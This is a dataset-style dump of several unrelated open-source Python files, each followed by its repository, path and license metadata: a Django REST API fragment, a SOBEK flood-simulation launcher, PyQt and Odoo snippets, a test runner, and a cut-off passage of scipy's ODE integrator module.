return bundle.request.build_absolute_uri(link)
def dehydrate_stats(self, bundle):
# Get the queryset first so that it can be cached
all_activities = bundle.obj.activities.all()
numViews = all_activities.filter(type=Activity.VIEW).count()
numLikes = all_activities.filter(type=Activity.LIKE).count()
likeActivityUri = None
if bundle.request.user.is_authenticated():
user_activities = all_activities.filter(user = bundle.request.user)
userViewed = user_activities.filter(type=Activity.VIEW).count() > 0
try:
activity = user_activities.get(type=Activity.LIKE)
activityResource = ActivityResource()
likeActivityUri = activityResource.get_resource_uri(activity)
except Activity.DoesNotExist:
                likeActivityUri = None
except:
logger.error("core.api.dehydrate_stats {}{}".format(sys.exc_info()[0], sys.exc_info()[1]))
pass
else:
userViewed = False
return {"numViews":numViews, "userViewed":userViewed, "numLikes":numLikes, "likeActivity":likeActivityUri}
class ActivityResource(ModelResource):
user = fields.ForeignKey(BanyanUserResource, 'user', full=True)
content_object = GenericForeignKeyField({
Story: StoryResource,
Piece: PieceResource,
BanyanUser: BanyanUserResource,
}, 'content_object')
class Meta:
always_return_data = True
queryset = Activity.objects.all()
authentication = MultiAuthentication(ApiKeyAuthentication(), SessionAuthentication(), Authentication())
authorization = ActivityAuthorization()
filtering = {
'object_id': ALL_WITH_RELATIONS,
'content_type': ALL_WITH_RELATIONS,
'user': ALL_WITH_RELATIONS,
'type': ['exact']
}
def hydrate_user(self, bundle):
if bundle.request.user.is_authenticated():
bundle.data['user'] = bundle.request.user
return bundle
'''
This should ideally be in accounts.api. However moving it here since there is
a cyclic dependency which doesn't seem to get resolved.
banyan.url: from core.api import StoryResource, PieceResource, ActivityResource ->
core.api: from accounts.api import BanyanUserResource ->
accounts.api: class BanyanUserNotificationsResource(ModelResource) ->
core.api: import StoryResource, PieceResource
'''
class BanyanUserNotificationsResource(ModelResource):
user = fields.ForeignKey('accounts.api.BanyanUserResource', 'user')
from_user = fields.ForeignKey('accounts.api.BanyanUserResource', 'from_user', null=True, blank=True)
content_object = GenericForeignKeyField({
Story: StoryResource,
Piece: PieceResource,
BanyanUser: BanyanUserResource,
}, 'content_object', null = True, blank = True)
class Meta:
queryset = BanyanUserNotifications.objects.all()
resource_name = 'notifications'
list_allowed_methods = []
detail_allowed_methods = ['get']
authentication = ApiKeyAuthentication() #Only from the devices
authorization = BanyanUserNotificationsAuthorization()
filtering = {
'user': ALL_WITH_RELATIONS,
}
|
asm-products/banyan-web
|
core/api.py
|
Python
|
agpl-3.0
| 11,423
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (division, print_function, absolute_import, unicode_literals)
from .sampler import *
from .interruptible_pool import InterruptiblePool
from .mpi_pool import MPIPool
from . import util
__version__ = '1.0.0'
|
willvousden/ptemcee
|
ptemcee/__init__.py
|
Python
|
mit
| 278
|
# Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from wlauto.common.resources import FileResource
class ReventFile(FileResource):
name = 'revent'
def __init__(self, owner, stage):
super(ReventFile, self).__init__(owner)
self.stage = stage
class JarFile(FileResource):
name = 'jar'
class ApkFile(FileResource):
name = 'apk'
|
freedomtan/workload-automation
|
wlauto/common/android/resources.py
|
Python
|
apache-2.0
| 903
|
from __future__ import print_function, division
from PyQt4 import QtGui, uic
from clas12_wiremap import initialize_session, dc_fill_tables, dc_find_connections
class Trial(QtGui.QWidget):
def __init__(self,parent=None):
super(QtGui.QWidget, self).__init__(parent)
uic.loadUi('Trial.ui',self)
self.updating = False
self.session = initialize_session()
def update_parameters(self):
if not self.updating:
self.updating = True
#slot called in qt designer
def button_changed(self):
for board in [2,3]:
#loop over things to get
print(board,":",self.get_button(board))
#the actual getting of each element
def get_button(self, board):
return getattr(self, 'SB' + str(board))
class MainWindow(QtGui.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.central_widget = QtGui.QWidget(self)
self.setCentralWidget(self.central_widget)
hbox = QtGui.QHBoxLayout()
self.trial = Trial()
hbox.addWidget(self.trial)
hbox.addStretch(1)
vbox = QtGui.QVBoxLayout(self.central_widget)
vbox.addLayout(hbox)
vbox.addStretch(1)
self.show()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
main_window = MainWindow()
sys.exit(app.exec_())
|
theodoregoetz/clas12-dc-wiremap
|
scratch/Trial3.py
|
Python
|
gpl-3.0
| 1,431
|
#!c:/python25/python.exe
# -*- coding: utf-8 -*-
#***********************************************************************
#*
#***********************************************************************
#* All rights reserved **
#*
#*
#* **
#*
#*
#*
#***********************************************************************
#* Library : <if this is a module, what is its name>
#* Purpose : task 130: spawn and watch sobek.simulate.
#* Function : main
#* Usage : spawnsobek.py --help
#*
#* Project : J0005
#*
#* $Id$
#*
#* $Name: $
#*
#* initial programmer : Mario Frasca
#* initial date : <yyyymmdd>
#* changed by : Alexandr Seleznev
#* changed at : 20120601
#* changes : integration with django, pylint, pep8
#**********************************************************************
__revision__ = "$Rev$"[6:-2]
"""this script executes simulate.exe and watches it until it ends or
times out. please refer to LizardKadebreukRekencentrumSobekUitvoeren
for more details.
"""
import time
import os # used throughout the code...
import logging
import subprocess
import threading
import re
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s',)
log = logging.getLogger('nens')
from flooding_lib.models import Scenario, ResultType
from flooding_base.models import Setting
from django import db
from zipfile import ZipFile, ZIP_DEFLATED
default_sobek_locations = {
'v2.09': 'sobek209/',
'v2.10': 'sobek210/',
'v2.11': 'sobek211/',
'v2.12': 'sobek212/',
}
def kill(pid):
"""kill function for Win32
returns the return code of TerminateProcess or
None in case of any failure"""
try:
import win32api
handle = win32api.OpenProcess(1, False, pid)
result = win32api.TerminateProcess(handle, -1)
win32api.CloseHandle(handle)
except:
result = None
pass
return result
def watchdog(child, cmtwork_dir):
"""keep running until the simulate program has written to the
PLUVIUS1.rtn file, then kill the subprocess in case it's still
running. does not return a value and does not check whether the
computation was successful. here we are only interested in
terminating the subprocess when the computation is completed.
"""
log.debug('inside watchdog cmtwork_dir %s, %s' % (type(cmtwork_dir), cmtwork_dir))
# keep ignoring code 51 while warming up. warming up ends as soon
# as a different code appears or after 20 seconds.
warming_up = 20
file_to_monitor = os.path.join(cmtwork_dir, 'PLUVIUS1.rtn')
last_stat = None
text = ' 51\nstill warming up'
while True:
try:
if warming_up:
warming_up -= 1
curr_stat = os.stat(file_to_monitor)
if curr_stat != last_stat:
# file changed
log.debug("file changed")
# reading it may cause an exception if 'simulate' is
# still writing to the file. no problem: we will
# check at next step.
input = open(os.path.join(cmtwork_dir, 'PLUVIUS1.rtn'))
text = input.readlines()
input.close()
log.debug("%s" % text)
# the assignment is at the end, so that it's not
# performed in case of an exception.
last_stat = curr_stat
# test the status code on the first line
result_code = int(text[0])
if result_code != 51:
warming_up = 0
if result_code == 51 and warming_up:
raise Exception("still warming up")
if result_code != 0:
                log.warning('the computation ended with an error.')
break
            # either it is still computing, or it has finished and the
            # computation succeeded.
            if text[1].find("Simulation finished succesfully") != -1:
                log.info('the computation appears to have finished (successfully).')
break
            # it is still computing...
except Exception, e:
            # an error occurred. for example: the file could not be opened,
            # or it does not have enough lines, or it is not in the expected
            # format. in any case, ignore all errors in the hope that the
            # next iteration succeeds.
log.debug("error in watchdog: (%s)..." % e)
pass
# keep the sleep time low, because threads can't be killed and
# the main thread will be waiting for the watchdog. a too
# high sleep time will slow down exiting on completion
log.debug('watchdog is about to go to sleep again')
time.sleep(1)
if child.poll() is not None:
log.debug('watchdog thinks child already died')
return
log.debug("watchdog thinks the child ended but will kill it to make sure.")
if kill(child.pid) is not None:
log.debug("it was a good idea to kill the child.")
output = open(os.path.join(cmtwork_dir, 'PLUVIUS1.rtn'), "w")
output.write(" 51\nSimulation interrupted by spawning script\n\n")
output.close()
def alarm_handler(timeout, child):
count = 0
while count < timeout:
time.sleep(1)
count += 1
if child.poll() is not None:
log.debug('alarm_handler thinks child already died')
return
log.debug("alarm_handler is about to kill the child")
kill(child.pid)
def set_broker_logging_handler(broker_handler=None):
"""
"""
if broker_handler is not None:
log.addHandler(broker_handler)
else:
log.warning("Broker logging handler does not set.")
def perform_sobek_simulation(scenario_id,
sobek_project_directory,
sobek_program_root,
project_name='lizardkb',
timeout=288000):
"""task 130: perform_sobek_simulation
"""
log.debug("step 0a: get settings")
log.debug("sobek_project_directory: %s" % sobek_project_directory)
log.debug("sobek_program_root: %s" % sobek_program_root)
scenario = Scenario.objects.get(pk=scenario_id)
sobek_location = os.path.join(
sobek_program_root,
default_sobek_locations[scenario.sobekmodel_inundation.sobekversion.name[:5]])
#sobek_location = [d for d in sobek_location.split('/') if d]
log.debug("sobek_location: %s" % sobek_location)
destination_dir = Setting.objects.get(key='DESTINATION_DIR').value
source_dir = Setting.objects.get(key='SOURCE_DIR').value
project_dir = os.path.join(sobek_location, sobek_project_directory)
log.debug("project_dir: %s" % project_dir)
log.debug("compute the local location of sobek files")
# first keep all paths as lists of elements, will join them using
# os.sep at the latest possible moment.
case_1_dir = os.path.join(project_dir, '1')
work_dir = os.path.join(project_dir, 'WORK')
cmtwork_dir = os.path.join(project_dir, 'CMTWORK')
output_dir_name = os.path.join(destination_dir, scenario.get_rel_destdir())
model_file_location = os.path.join(
destination_dir, scenario.result_set.get(resulttype=26).resultloc)
log.debug("empty project_dir WORK & 1")
for to_empty in [work_dir, case_1_dir, cmtwork_dir]:
for root, dirs, files in os.walk(to_empty):
for name in files:
os.remove(os.path.join(root, name))
log.debug("open the archived sobek model " + output_dir_name + "model.zip")
input_file = ZipFile(model_file_location, "r")
log.debug("unpacking the archived sobek model to project_dir WORK & 1")
if not os.path.isdir(os.path.join(work_dir, 'grid')):
os.makedirs(os.path.join(work_dir, 'grid'))
if not os.path.isdir(os.path.join(case_1_dir, 'grid')):
os.makedirs(os.path.join(case_1_dir, 'grid'))
for name in input_file.namelist():
content = input_file.read(name)
temp = file(os.path.join(work_dir, name), "wb")
temp.write(content)
temp.close()
temp = file(os.path.join(case_1_dir, name), "wb")
temp.write(content)
temp.close()
settings_ini_location = os.path.join(
source_dir,
scenario.sobekmodel_inundation.sobekversion.fileloc_startfile)
log.debug("copy from " + settings_ini_location + " to the CMTWORK dir")
for name in ['simulate.ini', 'casedesc.cmt']:
temp = file(os.path.join(cmtwork_dir, name), "w")
content = file(os.path.join(settings_ini_location, name), "r").read()
content = content.replace('lizardkb.lit', sobek_project_directory)
content = content.replace('LIZARDKB.LIT', sobek_project_directory)
temp.write(content)
temp.close()
program_name = os.path.join(sobek_location, "programs", "simulate.exe")
configuration = os.path.join(cmtwork_dir, 'simulate.ini')
log.debug("Close connection before spawning a subprocess.")
db.close_connection()
log.debug('about to spawn the simulate subprocess')
cmd, cwd = [program_name, configuration], cmtwork_dir
log.debug('command_list: %s, current_dir: %s' % (cmd, cwd))
os.chdir(cwd)
child = subprocess.Popen(cmd)
log.debug('about to start the watchdog thread')
log.debug('cmtwork_dir %s, %s' % (type(cmtwork_dir), cmtwork_dir))
watchdog_t = threading.Thread(target=watchdog, args=(child, cmtwork_dir))
watchdog_t.start()
log.debug('about to start the alarm thread')
alarm_t = threading.Thread(target=alarm_handler, args=(timeout, child,))
alarm_t.start()
log.debug("starting to wait for completion of subprocess")
child.wait()
log.debug('child returned')
log.debug("open all destination zip files.")
max_file_nr = {}
min_file_nr = {}
resulttypes = ResultType.objects.filter(program=1)
matcher_destination = [(r.id, re.compile(r.content_names_re, re.I),
ZipFile(os.path.join(output_dir_name, r.name + '.zip'),
mode="w", compression=ZIP_DEFLATED),
r.name)
for r in resulttypes if r.content_names_re is not None]
# check the result of the execution
saved = 0
for filename in os.listdir(work_dir):
log.debug("checking what to do with output file '%s'" % filename)
for type_id, matcher, dest, _ in matcher_destination:
if matcher.match(filename):
log.debug("saving %s to %s" % (filename, dest.filename))
content = file(os.path.join(work_dir, filename), 'rb').read()
dest.writestr(filename, content)
saved += 1
try:
nr = int(''.join([i for i in filename[4:] if i.isdigit()]))
if nr > max_file_nr.setdefault(type_id, 0):
max_file_nr[type_id] = nr
if nr < min_file_nr.setdefault(type_id, 999):
min_file_nr[type_id] = nr
except:
pass
break
log.debug("close all destination zip files")
for _, _, dest, _ in matcher_destination:
dest.close()
log.debug("adding to the database what results have been computed...")
for resulttype_id, _, _, name in matcher_destination:
# table results
result, new = scenario.result_set.get_or_create(
resulttype=ResultType.objects.get(pk=resulttype_id))
result.resultloc = os.path.join(
scenario.get_rel_destdir(), name + '.zip')
result.firstnr = min_file_nr.get(resulttype_id)
result.lastnr = max_file_nr.get(resulttype_id)
result.save()
log.info("saved %d files" % saved)
log.debug("check return code and return False if not ok")
try:
output = file(os.path.join(cmtwork_dir, 'PLUVIUS1.rtn'), "r")
remarks = output.read()
except:
remarks = ' 51\nerror reading output file'
remarks = 'rev: ' + __revision__ + "\n" + remarks
log.info(remarks)
log.debug("close db connection to avoid an idle process.")
db.close_connection()
successful = int(re.findall(r'\d+', remarks)[0]) == 0
return successful
|
lizardsystem/flooding-worker
|
flooding_worker/tasks/spawn.py
|
Python
|
gpl-3.0
| 12,846
|
# BEGIN_COPYRIGHT
#
# Copyright (C) 2014-2017 Open Microscopy Environment:
# - University of Dundee
# - CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# END_COPYRIGHT
import os
import unittest
def main():
test_root = os.path.dirname(os.path.abspath(__file__))
suite = unittest.defaultTestLoader.discover(test_root)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
if __name__ == "__main__":
main()
|
simleo/pydoop-features
|
test/all_tests.py
|
Python
|
apache-2.0
| 944
|
# -*- coding: utf-8 -*-
# Copyright 2017 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import fields, models
class AccountAccountType(models.Model):
_inherit = 'account.account.type'
_order = 'sequence asc'
sequence = fields.Integer(
string=u'Sequence',
)
|
thinkopensolutions/l10n-brazil
|
financial_account/models/inherited_account_account_type.py
|
Python
|
agpl-3.0
| 318
|
# Authors: Pearu Peterson, Pauli Virtanen, John Travers
"""
First-order ODE integrators.
User-friendly interface to various numerical integrators for solving a
system of first order ODEs with prescribed initial conditions::
d y(t)[i]
--------- = f(t,y(t))[i],
d t
y(t=0)[i] = y0[i],
where::
i = 0, ..., len(y0) - 1
class ode
---------
A generic interface class to numeric integrators. It has the following
methods::
integrator = ode(f, jac=None)
integrator = integrator.set_integrator(name, **params)
integrator = integrator.set_initial_value(y0, t0=0.0)
integrator = integrator.set_f_params(*args)
integrator = integrator.set_jac_params(*args)
y1 = integrator.integrate(t1, step=False, relax=False)
flag = integrator.successful()
class complex_ode
-----------------
This class has the same generic interface as ode, except it can handle complex
f, y and Jacobians by transparently translating them into the equivalent
real-valued system. It supports the real-valued solvers (i.e., not zvode) and is
an alternative to ode with the zvode solver, sometimes performing better.
"""
# XXX: Integrators must have:
# ===========================
# cvode - C version of vode and vodpk with many improvements.
# Get it from http://www.netlib.org/ode/cvode.tar.gz.
# To wrap cvode to Python, one must write the extension module by
# hand. Its interface is too much 'advanced C' that using f2py
# would be too complicated (or impossible).
#
# How to define a new integrator:
# ===============================
#
# class myodeint(IntegratorBase):
#
# runner = <odeint function> or None
#
# def __init__(self,...): # required
# <initialize>
#
# def reset(self,n,has_jac): # optional
# # n - the size of the problem (number of equations)
# # has_jac - whether user has supplied its own routine for Jacobian
# <allocate memory,initialize further>
#
# def run(self,f,jac,y0,t0,t1,f_params,jac_params): # required
# # this method is called to integrate from t=t0 to t=t1
# # with initial condition y0. f and jac are user-supplied functions
# # that define the problem. f_params,jac_params are additional
# # arguments
# # to these functions.
# <calculate y1>
# if <calculation was unsuccessful>:
# self.success = 0
# return t1,y1
#
# # In addition, one can define step() and run_relax() methods (they
# # take the same arguments as run()) if the integrator can support
# # these features (see IntegratorBase doc strings).
#
# if myodeint.runner:
# IntegratorBase.integrator_classes.append(myodeint)
__all__ = ['ode', 'complex_ode']
__version__ = "$Id$"
__docformat__ = "restructuredtext en"
import re
import warnings
from numpy import asarray, array, zeros, isscalar, real, imag, vstack
from . import vode as _vode
from . import _dop
from . import lsoda as _lsoda
_dop_int_dtype = _dop.types.intvar.dtype
_vode_int_dtype = _vode.types.intvar.dtype
_lsoda_int_dtype = _lsoda.types.intvar.dtype
# ------------------------------------------------------------------------------
# User interface
# ------------------------------------------------------------------------------
class ode:
"""
A generic interface class to numeric integrators.
Solve an equation system :math:`y'(t) = f(t,y)` with (optional) ``jac = df/dy``.
*Note*: The first two arguments of ``f(t, y, ...)`` are in the
opposite order of the arguments in the system definition function used
by `scipy.integrate.odeint`.
Parameters
----------
f : callable ``f(t, y, *f_args)``
Right-hand side of the differential equation. t is a scalar,
``y.shape == (n,)``.
``f_args`` is set by calling ``set_f_params(*args)``.
`f` should return a scalar, array or list (not a tuple).
jac : callable ``jac(t, y, *jac_args)``, optional
Jacobian of the right-hand side, ``jac[i,j] = d f[i] / d y[j]``.
``jac_args`` is set by calling ``set_jac_params(*args)``.
Attributes
----------
t : float
Current time.
y : ndarray
Current variable values.
See also
--------
odeint : an integrator with a simpler interface based on lsoda from ODEPACK
quad : for finding the area under a curve
Notes
-----
Available integrators are listed below. They can be selected using
the `set_integrator` method.
"vode"
Real-valued Variable-coefficient Ordinary Differential Equation
solver, with fixed-leading-coefficient implementation. It provides
implicit Adams method (for non-stiff problems) and a method based on
backward differentiation formulas (BDF) (for stiff problems).
Source: http://www.netlib.org/ode/vode.f
.. warning::
This integrator is not re-entrant. You cannot have two `ode`
instances using the "vode" integrator at the same time.
This integrator accepts the following parameters in `set_integrator`
method of the `ode` class:
- atol : float or sequence
absolute tolerance for solution
- rtol : float or sequence
relative tolerance for solution
- lband : None or int
- uband : None or int
Jacobian band width, jac[i,j] != 0 for i-lband <= j <= i+uband.
Setting these requires your jac routine to return the jacobian
in packed format, jac_packed[i-j+uband, j] = jac[i,j]. The
dimension of the matrix must be (lband+uband+1, len(y)).
- method: 'adams' or 'bdf'
Which solver to use, Adams (non-stiff) or BDF (stiff)
- with_jacobian : bool
This option is only considered when the user has not supplied a
Jacobian function and has not indicated (by setting either band)
that the Jacobian is banded. In this case, `with_jacobian` specifies
whether the iteration method of the ODE solver's correction step is
chord iteration with an internally generated full Jacobian or
functional iteration with no Jacobian.
- nsteps : int
Maximum number of (internally defined) steps allowed during one
call to the solver.
- first_step : float
- min_step : float
- max_step : float
Limits for the step sizes used by the integrator.
- order : int
Maximum order used by the integrator,
order <= 12 for Adams, <= 5 for BDF.
"zvode"
Complex-valued Variable-coefficient Ordinary Differential Equation
solver, with fixed-leading-coefficient implementation. It provides
implicit Adams method (for non-stiff problems) and a method based on
backward differentiation formulas (BDF) (for stiff problems).
Source: http://www.netlib.org/ode/zvode.f
.. warning::
This integrator is not re-entrant. You cannot have two `ode`
instances using the "zvode" integrator at the same time.
This integrator accepts the same parameters in `set_integrator`
as the "vode" solver.
.. note::
When using ZVODE for a stiff system, it should only be used for
the case in which the function f is analytic, that is, when each f(i)
is an analytic function of each y(j). Analyticity means that the
partial derivative df(i)/dy(j) is a unique complex number, and this
fact is critical in the way ZVODE solves the dense or banded linear
systems that arise in the stiff case. For a complex stiff ODE system
in which f is not analytic, ZVODE is likely to have convergence
failures, and for this problem one should instead use DVODE on the
equivalent real system (in the real and imaginary parts of y).
"lsoda"
Real-valued Variable-coefficient Ordinary Differential Equation
solver, with fixed-leading-coefficient implementation. It provides
automatic method switching between implicit Adams method (for non-stiff
problems) and a method based on backward differentiation formulas (BDF)
(for stiff problems).
Source: http://www.netlib.org/odepack
.. warning::
This integrator is not re-entrant. You cannot have two `ode`
instances using the "lsoda" integrator at the same time.
This integrator accepts the following parameters in `set_integrator`
method of the `ode` class:
- atol : float or sequence
absolute tolerance for solution
- rtol : float or sequence
relative tolerance for solution
- lband : None or int
- uband : None or int
Jacobian band width, jac[i,j] != 0 for i-lband <= j <= i+uband.
Setting these requires your jac routine to return the jacobian
in packed format, jac_packed[i-j+uband, j] = jac[i,j].
- with_jacobian : bool
*Not used.*
- nsteps : int
Maximum number of (internally defined) steps allowed during one
call to the solver.
- first_step : float
- min_step : float
- max_step : float
Limits for the step sizes used by the integrator.
- max_order_ns : int
Maximum order used in the nonstiff case (default 12).
- max_order_s : int
Maximum order used in the stiff case (default 5).
- max_hnil : int
Maximum number of messages reporting too small step size (t + h = t)
(default 0)
- ixpr : int
Whether to generate extra printing at method switches (default False).
"dopri5"
This is an explicit runge-kutta method of order (4)5 due to Dormand &
Prince (with stepsize control and dense output).
Authors:
E. Hairer and G. Wanner
Universite de Geneve, Dept. de Mathematiques
CH-1211 Geneve 24, Switzerland
e-mail: ernst.hairer@math.unige.ch, gerhard.wanner@math.unige.ch
This code is described in [HNW93]_.
This integrator accepts the following parameters in set_integrator()
method of the ode class:
- atol : float or sequence
absolute tolerance for solution
- rtol : float or sequence
relative tolerance for solution
- nsteps : int
Maximum number of (internally defined) steps allowed during one
call to the solver.
- first_step : float
- max_step : float
- safety : float
Safety factor on new step selection (default 0.9)
- ifactor : float
- dfactor : float
Maximum factor to increase/decrease step size by in one step
- beta : float
Beta parameter for stabilised step size control.
- verbosity : int
Switch for printing messages (< 0 for no messages).
"dop853"
This is an explicit runge-kutta method of order 8(5,3) due to Dormand
& Prince (with stepsize control and dense output).
Options and references the same as "dopri5".
Examples
--------
A problem to integrate and the corresponding jacobian:
>>> from scipy.integrate import ode
>>>
>>> y0, t0 = [1.0j, 2.0], 0
>>>
>>> def f(t, y, arg1):
... return [1j*arg1*y[0] + y[1], -arg1*y[1]**2]
>>> def jac(t, y, arg1):
... return [[1j*arg1, 1], [0, -arg1*2*y[1]]]
The integration:
>>> r = ode(f, jac).set_integrator('zvode', method='bdf')
>>> r.set_initial_value(y0, t0).set_f_params(2.0).set_jac_params(2.0)
>>> t1 = 10
>>> dt = 1
>>> while r.successful() and r.t < t1:
... print(r.t+dt, r.integrate(r.t+dt))
1 [-0.71038232+0.23749653j 0.40000271+0.j ]
2.0 [0.19098503-0.52359246j 0.22222356+0.j ]
3.0 [0.47153208+0.52701229j 0.15384681+0.j ]
4.0 [-0.61905937+0.30726255j 0.11764744+0.j ]
5.0 [0.02340997-0.61418799j 0.09523835+0.j ]
6.0 [0.58643071+0.339819j 0.08000018+0.j ]
7.0 [-0.52070105+0.44525141j 0.06896565+0.j ]
8.0 [-0.15986733-0.61234476j 0.06060616+0.j ]
9.0 [0.64850462+0.15048982j 0.05405414+0.j ]
10.0 [-0.38404699+0.56382299j 0.04878055+0.j ]
References
----------
.. [HNW93] E. Hairer, S.P. Norsett and G. Wanner, Solving Ordinary
Differential Equations i. Nonstiff Problems. 2nd edition.
Springer Series in Computational Mathematics,
Springer-Verlag (1993)
"""
def __init__(self, f, jac=None):
self.stiff = 0
self.f = f
self.jac = jac
self.f_params = ()
self.jac_params = ()
self._y = []
@property
def y(self):
return self._y
def set_initial_value(self, y, t=0.0):
"""Set initial conditions y(t) = y."""
if isscalar(y):
y = [y]
n_prev = len(self._y)
if not n_prev:
self.set_integrator('') # find first available integrator
self._y = asarray(y, self._integrator.scalar)
self.t = t
self._integrator.reset(len(self._y), self.jac is not None)
return self
def set_integrator(self, name, **integrator_params):
"""
Set integrator by name.
Parameters
----------
name : str
Name of the integrator.
integrator_params
Additional parameters for the integrator.
"""
integrator = find_integrator(name)
if integrator is None:
            # FIXME: this really should raise an exception. Will that break
# any code?
warnings.warn('No integrator name match with %r or is not '
'available.' % name)
else:
self._integrator = integrator(**integrator_params)
if not len(self._y):
self.t = 0.0
self._y = array([0.0], self._integrator.scalar)
self._integrator.reset(len(self._y), self.jac is not None)
return self
def integrate(self, t, step=False, relax=False):
"""Find y=y(t), set y as an initial condition, and return y.
Parameters
----------
t : float
The endpoint of the integration step.
step : bool
If True, and if the integrator supports the step method,
then perform a single integration step and return.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
relax : bool
If True and if the integrator supports the run_relax method,
then integrate until t_1 >= t and return. ``relax`` is not
referenced if ``step=True``.
This parameter is provided in order to expose internals of
the implementation, and should not be changed from its default
value in most cases.
Returns
-------
y : float
The integrated value at t
"""
if step and self._integrator.supports_step:
mth = self._integrator.step
elif relax and self._integrator.supports_run_relax:
mth = self._integrator.run_relax
else:
mth = self._integrator.run
try:
self._y, self.t = mth(self.f, self.jac or (lambda: None),
self._y, self.t, t,
self.f_params, self.jac_params)
except SystemError as e:
# f2py issue with tuple returns, see ticket 1187.
raise ValueError(
'Function to integrate must not return a tuple.'
) from e
return self._y
def successful(self):
"""Check if integration was successful."""
try:
self._integrator
except AttributeError:
self.set_integrator('')
return self._integrator.success == 1
def get_return_code(self):
"""Extracts the return code for the integration to enable better control
if the integration fails.
In general, a return code > 0 implies success, while a return code < 0
implies failure.
Notes
-----
This section describes possible return codes and their meaning, for available
integrators that can be selected by `set_integrator` method.
"vode"
=========== =======
Return Code Message
=========== =======
2 Integration successful.
-1 Excess work done on this call. (Perhaps wrong MF.)
-2 Excess accuracy requested. (Tolerances too small.)
-3 Illegal input detected. (See printed message.)
-4 Repeated error test failures. (Check all input.)
-5 Repeated convergence failures. (Perhaps bad Jacobian
supplied or wrong choice of MF or tolerances.)
-6 Error weight became zero during problem. (Solution
component i vanished, and ATOL or ATOL(i) = 0.)
=========== =======
"zvode"
=========== =======
Return Code Message
=========== =======
2 Integration successful.
-1 Excess work done on this call. (Perhaps wrong MF.)
-2 Excess accuracy requested. (Tolerances too small.)
-3 Illegal input detected. (See printed message.)
-4 Repeated error test failures. (Check all input.)
-5 Repeated convergence failures. (Perhaps bad Jacobian
supplied or wrong choice of MF or tolerances.)
-6 Error weight became zero during problem. (Solution
component i vanished, and ATOL or ATOL(i) = 0.)
=========== =======
"dopri5"
=========== =======
Return Code Message
=========== =======
1 Integration successful.
2 Integration successful (interrupted by solout).
-1 Input is not consistent.
-2 Larger nsteps is needed.
-3 Step size becomes too small.
-4 Problem is probably stiff (interrupted).
=========== =======
"dop853"
=========== =======
Return Code Message
=========== =======
1 Integration successful.
2 Integration successful (interrupted by solout).
-1 Input is not consistent.
-2 Larger nsteps is needed.
-3 Step size becomes too small.
-4 Problem is probably stiff (interrupted).
=========== =======
"lsoda"
=========== =======
Return Code Message
=========== =======
2 Integration successful.
-1 Excess work done on this call (perhaps wrong Dfun type).
-2 Excess accuracy requested (tolerances too small).
-3 Illegal input detected (internal error).
-4 Repeated error test failures (internal error).
-5 Repeated convergence failures (perhaps bad Jacobian or tolerances).
-6 Error weight became zero during problem.
-7 Internal workspace insufficient to finish (internal error).
=========== =======
"""
try:
self._integrator
except AttributeError:
self.set_integrator('')
return self._integrator.istate
def set_f_params(self, *args):
"""Set extra parameters for user-supplied function f."""
self.f_params = args
return self
def set_jac_params(self, *args):
"""Set extra parameters for user-supplied function jac."""
self.jac_params = args
return self
def set_solout(self, solout):
"""
Set callable to be called at every successful integration step.
Parameters
----------
solout : callable
``solout(t, y)`` is called at each internal integrator step,
t is a scalar providing the current independent position
            y is the current solution ``y.shape == (n,)``
solout should return -1 to stop integration
otherwise it should return None or 0
"""
if self._integrator.supports_solout:
self._integrator.set_solout(solout)
if self._y is not None:
self._integrator.reset(len(self._y), self.jac is not None)
else:
raise ValueError("selected integrator does not support solout,"
" choose another one")
def _transform_banded_jac(bjac):
"""
Convert a real matrix of the form (for example)
[0 0 A B] [0 0 0 B]
[0 0 C D] [0 0 A D]
[E F G H] to [0 F C H]
[I J K L] [E J G L]
[I 0 K 0]
That is, every other column is shifted up one.
"""
# Shift every other column.
newjac = zeros((bjac.shape[0] + 1, bjac.shape[1]))
newjac[1:, ::2] = bjac[:, ::2]
newjac[:-1, 1::2] = bjac[:, 1::2]
return newjac
class complex_ode(ode):
"""
A wrapper of ode for complex systems.
This functions similarly as `ode`, but re-maps a complex-valued
equation system to a real-valued one before using the integrators.
Parameters
----------
f : callable ``f(t, y, *f_args)``
Rhs of the equation. t is a scalar, ``y.shape == (n,)``.
``f_args`` is set by calling ``set_f_params(*args)``.
jac : callable ``jac(t, y, *jac_args)``
Jacobian of the rhs, ``jac[i,j] = d f[i] / d y[j]``.
``jac_args`` is set by calling ``set_f_params(*args)``.
Attributes
----------
t : float
Current time.
y : ndarray
Current variable values.
Examples
--------
For usage examples, see `ode`.
"""
def __init__(self, f, jac=None):
self.cf = f
self.cjac = jac
if jac is None:
ode.__init__(self, self._wrap, None)
else:
ode.__init__(self, self._wrap, self._wrap_jac)
def _wrap(self, t, y, *f_args):
f = self.cf(*((t, y[::2] + 1j * y[1::2]) + f_args))
# self.tmp is a real-valued array containing the interleaved
# real and imaginary parts of f.
self.tmp[::2] = real(f)
self.tmp[1::2] = imag(f)
return self.tmp
def _wrap_jac(self, t, y, *jac_args):
# jac is the complex Jacobian computed by the user-defined function.
jac = self.cjac(*((t, y[::2] + 1j * y[1::2]) + jac_args))
# jac_tmp is the real version of the complex Jacobian. Each complex
# entry in jac, say 2+3j, becomes a 2x2 block of the form
# [2 -3]
# [3 2]
jac_tmp = zeros((2 * jac.shape[0], 2 * jac.shape[1]))
jac_tmp[1::2, 1::2] = jac_tmp[::2, ::2] = real(jac)
